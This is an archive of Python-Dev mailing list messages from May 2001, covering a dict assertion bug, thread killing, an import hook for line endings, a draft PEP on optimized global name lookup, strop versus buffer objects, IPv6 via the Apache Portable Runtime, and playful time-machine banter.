<20010523124114.A4747@glacier.fnational.com> Tim Peters wrote: > Guido plans Python crises years in advance, and it shows in the > relative cleanliness of the Python codebase . I don't think Thomas has a time machine. Neil From tim.one@home.com Wed May 23 20:45:06 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 15:45:06 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net> Message-ID: [Aahz] > Okay, so we all know it isn't possible to kill threads cleanly and > safely in any kind of cross-platform way. At the same time, a program > that has a thread running haywire should be able to kill itself > completely, so that a monitoring process can restart it. How hard would > it be to do only that in a cross-platform way? Since Python is written in C, and C says nothing about this, you need a platform expert for each platform covered by "cross" . > I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No > clue what would need to happen for Windows and Mac. > > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) Please open a bug report on that, then, with a tiny test case if possible. This worked fine on Win98SE for me just now: import thread, os, time def task(): while 1: print "x", time.sleep(.1) for i in range(10): thread.start_new_thread(task, ()) time.sleep(5) os._exit(1) Windows kills all threads spawned by a process when "the main thread" exits. You don't need to do os._exit(), and sys.exit() is normally a much better idea (else, e.g., stdio buffers may not get flushed to disk). From thomas@xs4all.net Wed May 23 21:27:51 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 22:27:51 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> Message-ID: <20010523222751.G690@xs4all.nl> On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote: > Tim Peters wrote: > > Guido plans Python crises years in advance, and it shows in the > > relative cleanliness of the Python codebase . > > I don't think Thomas has a time machine. *Don't* get me started on that. If only Guido would stop hogging the damned thing, I could be a 34-year-old millionaire in a 10-room house and 8 girlfriends ! Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one@home.com Wed May 23 21:32:04 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 16:32:04 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl> Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. You wouldn't happen to have a reproducible test case? That hash==8 is almost certainly a red herring -- or a sign of wild stores . > Going back to revision 2.90 fixes the problem (or masks it). Instead of: assert(mp->ma_fill < mp->ma_size); this code used to be: if (mp->ma_fill >= mp->ma_size) { /* No room for a new key. * This only happens when the dict is empty. * Let dictresize() create a minimal dict. */ assert(mp->ma_used == 0); if (dictresize(mp, 0) != 0) return -1; assert(mp->ma_fill < mp->ma_size); } so the dict would get resized whenever ma_fill >= ma_size, although the code only *expected* that to happen when the dict table was NULL. It was perhaps happening in other cases too. The dict is never empty (NULL) after the patch, so the special case for "empty" got replaced by an assert. Offhand I don't see how this could be triggering -- although *something* about the 2.90 logic makes me uneasy! Ah, mp->ma_fill >= mp->ma_size wasn't a correct test: filled slots that aren't used slots don't stop a new key from being added. Assuming that's it, 2.90 could do needless calls to dictresize, but the new version does a bogus assert instead. So replace the current version's offending assert(mp->ma_fill < mp->ma_size); with assert(mp->ma_used < mp->ma_size); Let me know whether that solves it. 2.90 may also suffer a bogus assert(mp->ma_used == 0); failure. It's not easy to provoke any of this, though (requires exactly the right sequence of mixed inserts and deletes, with hash codes hitting exactly the right dict slots). From barry@digicool.com Wed May 23 21:52:22 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 16:52:22 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> Message-ID: <15116.8966.324136.897953@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> *Don't* get me started on that. If only Guido would stop TW> hogging the damned thing, I could be a 34-year-old millionaire TW> in a 10-room house and 8 girlfriends ! It's really not as easy as all that, though. When Guido's not around, I've been known to, er, take The Machine for a spin (sshh! Do /not/ tell him!). The first time I did, I didn't realize that the blue toggle had to be in the down position, and when I stepped out, everybody was speaking Esperanto, had half their heads shaved, and were toting around what looked like a cross between a dog and a beach ball (it drooled incessantly). Fortunately, The Machine has a reset button (oddly labeled "History Erase Button" and guarded by a candy-crazed TV announcer-like automaton who must be coaxed from the button with a marshmallow s'more). The second time I used it, I'd forgotten that you must keep your left hand on the silver sphere while you line up the parallel lines with the lip-actuated alpha wheel. Silly me, I'd removed my left hand just before alignment in order to twist the fluroscopic reflection tube a quarter rotation out of phase (rule of thumb: never listen to that automaton when he's licked the last of the chocolate-y goo from his fingers. He'll say anything to get another s'more.) You really don't want to know what that particular world looked like, but let's just say it involved lots and lots of angry elephants. So now I leave well enough alone, and I've learned that if you really want to change the past, just wait for Guido to use it for his own nefarious purposes, and tape a sign to his back requesting the (very modest) change to the continuum that you're looking for. And don't forget to smear the front of that sign with s'more. -Barry From tim.one@home.com Wed May 23 22:02:17 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 17:02:17 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. [Tim] > You wouldn't happen to have a reproducible test case? Nevermind; I do: d = {} for i in range(5): d[i] = i for i in range(5): del d[i] for i in range(5, 9): # assert triggers when i == 8 d[i] = i The cure is more complicated than I described, though. From esr@thyrsus.com Wed May 23 23:39:49 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 18:39:49 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523183949.A19251@thyrsus.com> Barry A. Warsaw : > You really don't want to know what that particular world looked like, > but let's just say it involved lots and lots of angry elephants. You've been *there*? Dang...that's the timeline that scared me into hanging up my lab coat. It was a slow Saturday and I was hatching Sinister Plan For World Domination number 4. What happened to the other three? Well...I had been planning to terrorize the western U.S with a giant mechanical spider, until some guys from Hollywood offered me way too much money for it. The trained army of radioactive gorillas I spent the movie money on didn't work out -- my Igor flatly refused to shovel any more radioactive gorilla poop, and you know how hard it is to get good help these days. Blackmailing major cities with a Zeppelin-mounted death ray projector sounded cool but Radio Shack was out of the parts. OK, so plan #4 was to create voracious mega-amoebas using my Ionic Mutatron and send them out to destroy all my enemies, especially that kid who beat me up in third grade. There I was, cackling insanely, just about to unleash these slimy horrors on an unsuspecting world to wreak havoc and destruction, when the eka-rhodium electrodes on the Mutatron arced over. This produced a wild spike of temporokinetic energy, and guess where *I* was standing? Silly me. Before you could say "plot complication" I was materializing in the Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself, as it turned out, who was getting wound up to try out his newest human-goad on a mahout they had just captured from the Fortified Cities. The mahout was terrified out of his wits, and you would have been too if you'd seen what the High Pachyderm's tusks were covered with and the lascivious way his trunk was curled around that cheese grater. Euggghhh... It was crazy. The High Pachyderm was trumpeting like mad, tuskers charging at me from all directions, and me with at least 5.23 seconds to go until the temporokinetic charge wore off. Fortunately I remembered that elephants communicate using modulated infrasonics that they hear with the flat part of their foreheads, and I had my trusty sonic screwdriver on me. I set it to "infra" at maximum volume and hurled it at the High Pachyderm -- hit the bugger right in the tiara. He went berserk and his confused guards started crashing into each other left and right, which was a pretty impressive sight since the smallest of them weighed over two and a half tons. It was touch and go there, let me tell you. I caught one glimpse of the mahout's rapidly-retreating heels just as the charge wore off and I was slingshotted back to my lab. My sonic screwdriver, of course, followed within seconds -- horribly crushed and mangled. And that's when I swore off building fiendish devices. Electrocution I can laugh at, having my monstrous creations turn on me is all in a day's work, and that one time I was accidentally transformed into a fly I found some truly remarkable uses for a three-foot-long prehensile tongue. But what the High Pachyderm had planned was too twisted even for *me*. I decided Sinister Plan #5 would have to be a bit less hardware-intensive, if only as a rest for my frazzled nerves. So I spent the last juice in the batteries on the orbital mind-control lasers (long story) to implant some subtle suggestions in a few minds at Netscape and IBM and elsewhere, and started hitting the conference circuit pretty heavy. What suggestions? Oh, nothing important. Nothing at all...BWAHAHAHAHA!!! -- Eric S. Raymond Sometimes the law defends plunder and participates in it. Sometimes the law places the whole apparatus of judges, police, prisons and gendarmes at the service of the plunderers, and treats the victim -- when he defends himself -- as a criminal. -- Frederic Bastiat, "The Law" From gward@python.net Thu May 24 00:48:10 2001 From: gward@python.net (Greg Ward) Date: Wed, 23 May 2001 19:48:10 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523194810.A9947@gerg.ca> On 23 May 2001, Barry A. Warsaw said: > The second time I used it, I'd forgotten that you must keep your left > hand on the silver sphere while you line up the parallel lines with > the lip-actuated alpha wheel. What? You mean Guido's time machine was really designed by Larry Wall? Oh, the irony... Greg -- Greg Ward - Python bigot gward@python.net http://starship.python.net/~gward/ If you can read this, thank a programmer. From dgoodger@bigfoot.com Thu May 24 02:04:46 2001 From: dgoodger@bigfoot.com (David Goodger) Date: Wed, 23 May 2001 21:04:46 -0400 Subject: [Python-Dev] Re: Import hook to do end-of-line conversion? In-Reply-To: <3B0AF45D.732126E6@home.net> Message-ID: Yesterday I found I had need for an end-of-line conversion import hook. I looked sround but found none (did I miss some code on this thread?), so I whipped one up (below). It seems to do the job. If you see any goofs, gaffes or gotchas, or if you know of a better way to do this, please let me know. I will post this code to c.l.py in a few days for the enjoyment of all. -- David Goodger dgoodger@bigfoot.com Open-source projects: - The Go Tools Project: http://gotools.sourceforge.net - reStructuredText: http://structuredtext.sourceforge.net (soon!) -----%<----------cut----------%<----------%<----------cut----------%<----- # Import hook for end-of-line conversion, # by David Goodger (dgoodger@bigfoot.com). # Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to # import Python modules with any of Unix, Mac, or Windows line endings. import ihooks, imp, py_compile class MyHooks(ihooks.Hooks): def load_source(self, name, filename, file=None): """Compile source files with any line ending.""" if file: file.close() py_compile.compile(filename) # line ending conversion is in here cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb') try: return self.load_compiled(name, filename, cfile) finally: cfile.close() class MyModuleLoader(ihooks.ModuleLoader): def load_module(self, name, stuff): """Special-case package directory imports.""" file, filename, (suff, mode, type) = stuff path = None if type == imp.PKG_DIRECTORY: stuff = self.find_module_in_dir("__init__", filename, 0) file = stuff[0] # package/__init__.py path = [filename] try: # let superclass handle the rest module = ihooks.ModuleLoader.load_module(self, name, stuff) finally: if file: file.close() if path: module.__path__ = path # necessary for pkg.module imports return module ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install() From jeremy@alum.mit.edu Thu May 24 02:10:55 2001 From: jeremy@alum.mit.edu (Jeremy Hylton) Date: Wed, 23 May 2001 21:10:55 -0400 (EDT) Subject: [Python-Dev] pre-PEP on optimized global names Message-ID: <200105240110.VAA09078@newman.concentric.net> I've been hoping to work on optimized global and builtin name support for Python 2.2. I'm not sure if I'll have time, but thought I'd circulate a draft with some notes on the subject now. Anyone interested in this work? Jeremy PEP: ??? Title: Optimized Access to Module and Builtin Names Author: jeremy@digicool.com (Jeremy Hylton) Status: Draft Type: Standards Track Python-Version: 2.2 Created: 23-May-2001 Abstract This PEP proposes a new implementation of global module namespaces and the builtin namespace that speeds name resolution. The implementation would use an array of object pointers for most operations in these namespaces. The compiler would assign indices for global variables at compile time. The current implementation represents these namespaces as dictionaries. A global name incurs a dictionary lookup each time it is used; a builtin name incurs two dictionary lookups, a failed lookup in the global namespace and a second lookup in the builtin namespace. This implementation should speed Python code that uses module-level functions and variables. It should also eliminate awkward coding styles that have evolved to speed access to these names. The implementation is complicated because the global and builtin namespaces can be modified dynamically in ways that are impossible for the compiler to detect. (Example: A module's namespace is modified by a script after the module is imported.) As a result, the implementation must maintain several auxillary data structures to preserve these dynamic features. Introduction [expand on the basic ideas in the abstract] [describe the key parts of the design: dlict, compiler support, stupid name trick workarounds, optimization of other module's globals] DLict design The namespaces are implemented using a data structure that has sometimes gone under the name dlict. It is a dictionary that has numbered slots for some dictionary entries. The type must be implemented in C to achieve acceptable performance. A Python implementation is included here to explain the basic design: """A dictionary-list hybrid""" import types class DLict: def __init__(self, names): assert isinstance(names, types.DictType) self.names = {} self.list = [None] * size self.empty = [1] * size self.dict = {} self.size = 0 def __getitem__(self, name): i = self.names.get(name) if i is None: return self.dict[name] if self.empty[i] is not None: raise KeyError, name return self.list[i] def __setitem__(self, name, val): i = self.names.get(name) if i is None: self.dict[name] = val else: self.empty[i] = None self.list[i] = val self.size += 1 def __delitem__(self, name): i = self.names.get(name) if i is None: del self.dict[name] else: if self.empty[i] is not None: raise KeyError, name self.empty[i] = 1 self.list[i] = None self.size -= 1 def keys(self): if self.dict: return self.names.keys() + self.dict.keys() else: return self.names.keys() def values(self): if self.dict: return self.names.values() + self.dict.values() else: return self.names.values() def items(self): if self.dict: return self.names.items() else: return self.names.items() + self.dict.items() def __len__(self): return self.size + len(self.dict) def __cmp__(self, dlict): c = cmp(self.names, dlict.names) if c != 0: return c c = cmp(self.size, dlict.size) if c != 0: return c for i in range(len(self.names)): c = cmp(self.empty[i], dlict.empty[i]) if c != 0: return c if self.empty[i] is None: c = cmp(self.list[i], dlict.empty[i]) if c != 0: return c return cmp(self.dict, dlict.dict) def clear(self): self.dict.clear() for i in range(len(self.names)): if self.empty[i] is None: self.empty[i] = 1 self.list[i] = None def update(self): pass def load(self, index): """dlict-special method to support indexed access""" if self.empty[index] is None: return self.list[index] else: raise KeyError, index # XXX might want reverse mapping def store(self, index, val): """dlict-special method to support indexed access""" self.empty[index] = None self.list[index] = val def delete(self, index): """dlict-special method to support indexed access""" self.empty[index] = 1 self.list[index] = None Compiler issues The compiler currently collects the names of all global variables in a module. These are names bound at the module level or bound in a class or function body that declares them to be global. The compiler would assign indices for each global name and add the names and indices of the globals to the module's code object. Each code object would then be bound irrevocably to the module it was defined in. (Not sure if there are some subtle problems with this.) Enhancement: Optimized access to other module's globals If one module imports another and binds a name in the global namespace, the compiler currently detects that the particular global is bound to a module. The compiler also note access to any attribute of a module, and emit special opcodes for accessing these names. At runtime the implementation can lookup the index of the module attribute in the module's namespace. In the current namespace, a pointer to the foreign module's dlict can be recorded along with the name's offset in the dlict. This would allow names, e.g. types.StringType, to be used with the same efficiency as globals. Backwards compatibility The dlict will need to maintain metainformation about whether a slot is currently used or not. It will also need to maintain a pointer to the builtin namespace. When a name is not currently used in the global namespace, the lookup will have to fail over to the builtin namespace. In the reverse case, each module may need a special accessor function for the builtin namespace that checks to see if a global shadowing the builtin has been added dynamically. This check would only occur if there was a dynamic change to the module's dlict, i.e. when a name is bound that wasn't discovered at compile-time. These mechanisms would have little if any cost for the common case whether a module's global namespace is not modified in strange ways at runtime. They would add overhead for modules that did unusual things with global names, but this is an uncommon practice and probably one worth discouraging. It may be desirable to disable dynamic additions to the global namespace in some future version of Python. If so, the new implementation could provide warnings. Local Variables: mode: indented-text indent-tabs-mode: nil End: From barry@digicool.com Thu May 24 03:46:30 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 22:46:30 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> Message-ID: <15116.30214.900667.624573@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Before you could say "plot complication" I was materializing ESR> in the Hyraxeum -- damn near nose-to-trunk with the High ESR> Pachyderm himself, as it turned out, who was getting wound up ESR> to try out his newest human-goad on a mahout they had just ESR> captured from the Fortified Cities. That big self-important elephant wasn't named Puffy the Frog by any chance, was he? Did he taste vaguely lemony? If so, he's got a lot of nerve calling himself the "High Pachyderm"! Quite a lofty title for one who's skin is stretched to just this side of its tensile breaking point. Sure, I know ol' Puffy, had a few binges with the old goat myself. You just don't want to be near him when the stray micro-meteor happens to pierce his dermis. Much, MUCH messier than eight crates of cornbob filled to the brim with radioactive gorilla poop, I can assure you! now-where'd-i-leave-my-medication?-ly y'rs, -Barry From esr@thyrsus.com Thu May 24 04:04:58 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:04:58 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> Message-ID: <20010523230458.A28895@thyrsus.com> Barry A. Warsaw : > That big self-important elephant wasn't named Puffy the Frog by any > chance, was he? Did he taste vaguely lemony? If so, he's got a lot > of nerve calling himself the "High Pachyderm"! Quite a lofty title > for one who's skin is stretched to just this side of its tensile > breaking point. Congratulations, Barry. I googled for "Puffy the Frog" and found a page that...explained...this. It was the #1 hit. Apparently the Universe is an even more random place than I thought. -- Eric S. Raymond If I were to select a jack-booted group of fascists who are perhaps as large a danger to American society as I could pick today, I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms]. -- U.S. Representative John Dingell, 1980 From barry@digicool.com Thu May 24 04:14:07 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 23:14:07 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> Message-ID: <15116.31871.122265.883855@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Congratulations, Barry. I googled for "Puffy the Frog" and ESR> found a page that...explained...this. It was the #1 hit. Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass singer in the Atlanta-based band "The Shrinking of George". What you found is no doubt the lyrics to that song, which topped the pop charts briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact), displacing the Beatles "I Wanna Hold Your Head" before being itself displaced by the The Bee Gee's "Booger Feever" [sic]. Sadly, even Napster doesn't have the mp3's and all Dad's old records are scratched beyond hope. ESR> Apparently the Universe is an even more random place than I ESR> thought. here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, -Barry From esr@thyrsus.com Thu May 24 04:31:42 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:31:42 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org> Message-ID: <20010523233142.A29023@thyrsus.com> Barry A. Warsaw : > Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass > singer in the Atlanta-based band "The Shrinking of George". I suppose it's not a coincidence that it's Fernando Poo day today. Of course it's not a coincidence. There are no coincidences anywhere. Fnord. -- Eric S. Raymond Sometimes it is said that man cannot be trusted with the government of himself. Can he, then, be trusted with the government of others? -- Thomas Jefferson, in his 1801 inaugural address From aahz@rahul.net Thu May 24 05:59:37 2001 From: aahz@rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 21:59:37 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 23, 2001 03:45:06 PM Message-ID: <20010524045938.5228199C83@waltz.rahul.net> Tim Peters wrote: > [Aahz] >> >> (This got brought up because I experimented with os._exit() as a >> possible solution, but that GPFs on Win98SE.) > > Please open a bug report on that, then, with a tiny test case if possible. > This worked fine on Win98SE for me just now: Futz. *Now* it works. Chalk it up to another unreproducible bug caused by an unstable Win98. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From gstein@lyra.org Thu May 24 09:33:49 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:33:49 -0700 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82 In-Reply-To: ; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700 References: Message-ID: <20010524013349.Y5402@lyra.org> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > Update of /cvsroot/python/python/dist/src/Modules > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > Modified Files: > stropmodule.c > Log Message: > Add warnings to the strop module, for to those functions that really > *are* obsolete; three variables and the maketrans() function are not > (yet) obsolete. > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > Add this to the NEWS. Something that I ran into the other day... >>> ob = some_object_implementing_the_buffer_interface >>> string.find(ob, '.') (fails because ob does not define the .find method) >>> strop.find(ob, '.') (succeeds) The point is that strop uses the t# to get a ptr/len pair to do its work. Thus, it can work on many things that export the buffer interface. Dropping strop means we no longer have many of those functions. Instead, the functionality must be copied to *every* object that implements the buffer interface. We can say ob.find() now, but we can't say find(ob) any longer. And saying that all objects (which implement the buffer API) must now implement a bunch of "standard" methods is awfully burdensome. In my particular case, I was trying to do a find on a BufferObject referring to a subset of another object. Blam. No good. Thankfully, when I did a find() on a mmap object, it worked simply because mmaps happen to define a .find method. [ of course, the find method on an mmap was totally broken, but I checked in a fix for that (last week or so) ] So... my question is: is there any way that we can retain a generic find() (and similar functions from the string/strop module) that operates on any type that implements the buffer API? Maybe there is some way we can do a mixin for Python types? e.g. "this mixin implements some standard methods for 8-bit character data (using the buffer API), which can be mixed into new Python types" That would reduce the burden for new types. Thoughts? Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein@lyra.org Thu May 24 09:52:58 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:52:58 -0700 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400 References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <20010524015258.Z5402@lyra.org> On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote: > What's out IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) Radical suggestion: Toss out a ton of the platform-specific stuff in Python and use the Apache Portable Runtime (APR). It has IPv6 in it, but it could also help with loading shared libraries, threading, mmap'd files, sockets, etc. (it won't replace *all* of Python's platform specific stuff; I think Python has more coverage than APR does) Could simplify a number of things for Python, and reduce some of the maintenance costs... Cheers, -g -- Greg Stein, http://www.lyra.org/ From thomas@xs4all.net Thu May 24 10:01:52 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 11:01:52 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010524110152.Q676@xs4all.nl> [ Answer CC'd to python-dev since it deserves an official answer :) ] On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote: > For summarasing purposes, do you have any idea when Python 2.1.1 will > be released? > "No" is a perfectly acceptable answer. Then "No" it is ! Even though I have a fair bit of patches in the queue right now, I need some more time to check out (no pun intended) the changes since the fork, and I want to browse the bug list for possible bugs that should be checked out and fixed for 2.1.1. Another couple of weeks at least, before a release candidate. It also depends on Moshe; if he actually releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal@lemburg.com Thu May 24 11:18:50 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 12:18:50 +0200 Subject: [Python-Dev] strop vs. string References: <20010524013349.Y5402@lyra.org> Message-ID: <3B0CE00A.488C8D73@lemburg.com> Greg Stein wrote: > > On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > > Update of /cvsroot/python/python/dist/src/Modules > > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > > > Modified Files: > > stropmodule.c > > Log Message: > > Add warnings to the strop module, for to those functions that really > > *are* obsolete; three variables and the maketrans() function are not > > (yet) obsolete. > > > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > > > Add this to the NEWS. > > Something that I ran into the other day... > > >>> ob = some_object_implementing_the_buffer_interface > >>> string.find(ob, '.') > (fails because ob does not define the .find method) > >>> strop.find(ob, '.') > (succeeds) > > The point is that strop uses the t# to get a ptr/len pair to do its work. > Thus, it can work on many things that export the buffer interface. Dropping > strop means we no longer have many of those functions. Instead, the > functionality must be copied to *every* object that implements the buffer > interface. > > We can say ob.find() now, but we can't say find(ob) any longer. And saying > that all objects (which implement the buffer API) must now implement a bunch > of "standard" methods is awfully burdensome. > > In my particular case, I was trying to do a find on a BufferObject referring > to a subset of another object. Blam. No good. Thankfully, when I did a > find() on a mmap object, it worked simply because mmaps happen to define a > .find method. > > [ of course, the find method on an mmap was totally broken, but I checked in > a fix for that (last week or so) ] > > So... my question is: is there any way that we can retain a generic find() > (and similar functions from the string/strop module) that operates on any > type that implements the buffer API? > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin > implements some standard methods for 8-bit character data (using the buffer > API), which can be mixed into new Python types" That would reduce the burden > for new types. I suppose that in 2.2 we'll be able to build a class/type hierarchy which then provides these possibilities. I haven't followed Guido's latest checkins closely though -- could be that types don't support multiple inheritence. BTW, wouldn't it suffice to add these methods to buffer objects ? Then you could write: buffer(ob).find('.'). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry@digicool.com Thu May 24 12:50:34 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Thu, 24 May 2001 07:50:34 -0400 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> Message-ID: <15116.62858.720241.46017@anthem.wooz.org> >>>>> "GS" == Greg Stein writes: GS> Toss out a ton of the platform-specific stuff in Python and GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but GS> it could also help with loading shared libraries, threading, GS> mmap'd files, sockets, etc. I don't know squat about APR, but would it have to be either-or? IOW, would it be possible to wrap the APR in a module (or package) and provide it as an importable alternative? -Barry From mal@lemburg.com Thu May 24 13:22:42 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 14:22:42 +0200 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> Message-ID: <3B0CFD12.164271D8@lemburg.com> "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > GS> Toss out a ton of the platform-specific stuff in Python and > GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but > GS> it could also help with loading shared libraries, threading, > GS> mmap'd files, sockets, etc. > > I don't know squat about APR, but would it have to be either-or? IOW, > would it be possible to wrap the APR in a module (or package) and > provide it as an importable alternative? Should be possible; the problem is: how do you get the APR types to interact with the original Python ones (e.g. file types). Many low-level Python functions require the native Python types, so while wrapping APR as Python module would provide an alternative, that alternative will most probably not help much w/r to simplifying portability issues. FYI, here's what the APR has to offer (taken from the APRDesign file that comes with Apache 2.0 beta): """ The base types in APR file_io File I/O, including pipes lib A portable library originally used in Apache. This contains memory management, tables, and arrays. locks Mutex and reader/writer locks misc Any APR type which doesn't have any other place to belong network_io Network I/O shmem Shared Memory (Not currently implemented) signal Asynchronous Signals threadproc Threads and Processes time Time """ It currently supports: Unix (includes BeOS), Win32 and OS/2. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From gstein@lyra.org Thu May 24 13:55:55 2001 From: gstein@lyra.org (Greg Stein) Date: Thu, 24 May 2001 05:55:55 -0700 Subject: [Python-Dev] APR (was: IPv6) In-Reply-To: <3B0CFD12.164271D8@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 02:22:42PM +0200 References: 